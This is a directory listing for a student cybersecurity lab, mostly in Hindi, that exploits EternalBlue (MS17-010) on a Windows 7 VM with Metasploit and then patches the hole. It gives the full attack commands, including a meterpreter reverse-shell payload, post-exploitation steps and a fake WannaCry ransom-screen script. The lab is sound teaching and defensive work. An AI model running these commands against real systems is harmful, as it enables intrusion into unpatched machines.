Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EternalBlue-Exploit-Demonstration — Cybersecurity lab demonstrating exploitation of CVE-2017-0144 (EternalBlue) using Metasploit against a vulnerable Windows 7 VM, achieving SYSTEM-level access via Meterpreter. Includes full attack chain, post exploitation, and mitigation via MS17-010 patching, tested in an isolated ethical lab environment. | Kitploit
उपकरण/GitHubGitHub/dannic145/eternalblue-exploit-demonstration
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationPost-ExploitationMalware AnalysisCTFPenetration TestingLearning & Education

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

Cybersecurity lab demonstrating exploitation of CVE-2017-0144 (EternalBlue) using Metasploit against a vulnerable Windows 7 VM, achieving SYSTEM-level access via Meterpreter. Includes full attack chain, post exploitation, and mitigation via MS17-010 patching, tested in an isolated ethical lab environment.

Red Teaming
Labs & Practice
GitHubdannic145/eternalblue-exploit-demonstration

EternalBlue-Exploit-Demonstration

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

EternalBlue एक्सप्लॉइट प्रदर्शन (MS17-010)

साइबर सुरक्षा लैब जो CVE-2017-0144 (EternalBlue) का उपयोग करके Metasploit के माध्यम से एक असुरक्षित Windows 7 सिस्टम का शोषण करती है, और Meterpreter के ज़रिए SYSTEM-स्तर की पहुँच प्राप्त करती है।

यह परियोजना WannaCry-शैली के रैनसमवेयर हमले (सुरक्षित डेमो) का अनुकरण भी करती है और MS17-010 सुरक्षा पैच का उपयोग करके शमन प्रदर्शित करती है।


मॉड्यूल जानकारी

मॉड्यूल: CSCM828 सुरक्षा कमजोरियाँ और पेनिट्रेशन टेस्टिंग

छात्र:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

विश्वविद्यालय: Swansea University


संसाधन और डाउनलोड

  1. MS17-010 EternalBlue SMB रिमोट विंडोज कर्नेल पूल करप्शन
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Windows 7 x64 सुरक्षा अपडेट)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (वर्चुअल मशीन डाउनलोड)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium English x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro 17.6.4
    https://www.vmware.com/products/desktop-hyper


1. अवलोकन

यह लैब प्रदर्शित करता है:

  • SMB कमजोरी (MS17-010) का रिमोट एक्सप्लॉइटेशन
  • EternalBlue के माध्यम से कर्नेल-स्तर की पहुँच
  • Meterpreter सत्र स्थापना
  • पोस्ट-एक्सप्लॉइटेशन तकनीकें
  • WannaCry-शैली ransomware सिमुलेशन (सुरक्षित)
  • पैचिंग के माध्यम से शमन

2. लैब वातावरण

आवश्यकताएँ

  • VMware Workstation / VirtualBox
  • न्यूनतम 8GB RAM

हमलावर मशीन

  • Kali Linux
  • Metasploit फ्रेमवर्क

पीड़ित मशीन

  • Windows 7 SP1 x64 (अनपैच्ड)

नेटवर्क

  • होस्ट-ओनली / NAT (पृथक वातावरण)
  • सुनिश्चित करें कि दोनों मशीनें संवाद कर सकें

⚠️ यह लैब पूरी तरह से पृथक वातावरण में संचालित की जानी चाहिए।


3. पीड़ित सेटअप (Windows 7)

एडमिनिस्ट्रेटर कमांड प्रॉम्प्ट में चलाएँ:

फायरवॉल अक्षम करें

root@kitploit:~
netsh advfirewall set allprofiles state off

SMB पोर्ट सत्यापित करें

root@kitploit:~
netstat -an | findstr :445

अपडेट अक्षम करें (लैब स्थिरता के लिए)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. हमलावर सेटअप (Kali Linux)

कनेक्टिविटी सत्यापित करें

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. एक्सप्लॉइटेशन चरण

चरण 1: लक्ष्य स्कैन करें

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

अपेक्षित:

  • होस्ट असुरक्षित है

चरण 2: एक्सप्लॉइट चलाएँ

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

चरण 3: पहुँच की पुष्टि करें

root@kitploit:~
meterpreter > getuid

अपेक्षित:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. पोस्ट-एक्सप्लॉइटेशन

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

स्थिर माइग्रेशन

root@kitploit:~
ps
migrate <explorer.exe PID>

7. WannaCry सिमुलेशन (सुरक्षित डेमो)

पेलोड बनाएँ (Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

अपलोड और निष्पादित करें

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. शमन (पैच प्रदर्शन)

चरण 1: पैच डाउनलोड करें

  • यहाँ जाएँ: https://www.catalog.update.microsoft.com/
  • खोजें: KB4012212 Windows 7 x64
  • .msu फ़ाइल डाउनलोड करें

चरण 2: पैच स्थापित करें

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

चरण 3: पुनरारंभ करें

root@kitploit:~
shutdown /r /t 0

चरण 4: पैच सत्यापित करें

root@kitploit:~
systeminfo | findstr KB4012212

चरण 5: एक्सप्लॉइट पुनः चलाएँ

अपेक्षित:

  • एक्सप्लॉइट विफल होता है
  • कोई Meterpreter सत्र नहीं

चरण 6: Nmap से सत्यापित करें

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

अपेक्षित:

  • असुरक्षित नहीं

9. समस्या निवारण

समस्यासमाधान
एक्सप्लॉइट विफल होता हैकनेक्टिविटी जाँचें
कोई सत्र नहींफायरवॉल अक्षम करें
सत्र समाप्त हो जाता हैएक्सप्लॉइट पुनः प्रयास करें
कोई दृश्य विंडो नहींexplorer.exe पर माइग्रेट करें

10. नैतिक विचार

यह परियोजना संचालित की गई है:

  • केवल नियंत्रित लैब मशीनों पर
  • पूरी तरह से पृथक नेटवर्क में
  • केवल शैक्षिक उद्देश्यों के लिए

अनधिकृत उपयोग उल्लंघन करता है:

  • यूके कंप्यूटर मिसयूज़ अधिनियम 1990

11. निष्कर्ष

यह लैब प्रदर्शित करता है:

  • EternalBlue का उपयोग कर वास्तविक दुनिया का SMB एक्सप्लॉइटेशन
  • Windows 7 का SYSTEM-स्तर से समझौता
  • Ransomware हमला सिमुलेशन (सुरक्षित)
  • समय पर पैचिंग का महत्व
टूल डाउनलोड करें